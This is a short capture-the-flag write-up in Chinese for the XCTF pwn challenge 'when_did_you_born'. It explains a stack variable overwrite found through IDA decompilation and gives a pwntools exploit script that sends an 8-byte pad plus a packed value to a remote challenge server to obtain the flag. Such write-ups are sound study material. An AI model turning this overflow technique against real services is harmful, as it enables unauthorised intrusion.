XCTF - pwn when_did_you_born - WP

Posted 2022-10-21 tsuiyields

1.先拉进虚拟机运行一下

 

 

2.检查一下文件格式，发现是64位文件，然后这个文件开了 canary 和 Nx 保护，但是影响不大。

 

 

3.用 ida64 反编译查看一下，进入main函数。不难发现，当进入 else 分支后使得 v6 得 1926 即可得到 flag。

 

 

4.现在的问题是将第一次 v6 不得 1926 而第二次检查 v6 时却是 1926 。我们注意上面定义变量时，v5  的地址为 20h，v6 为 18h。因此我们可以构造 exp 来使用第二次输入来将 v6 覆盖为 1926。而其中两个变量的差值为 8.因此 payload 就能构造了。

 

 

 

5.

#!/usr/bin/env python
from pwn import *

# v5 - 20h    
# v6 - 18h
#result = 1926

payload = ‘aaaaaaaa‘ + str(p64(1926))


r = remote("111.198.29.45", 57262)
r.recvuntil("Birth?")
r.sendline("2000")
r.recvuntil("Name?")
r.sendline(payload)

r.interactive()

 

 

6.运行脚本后得到 flag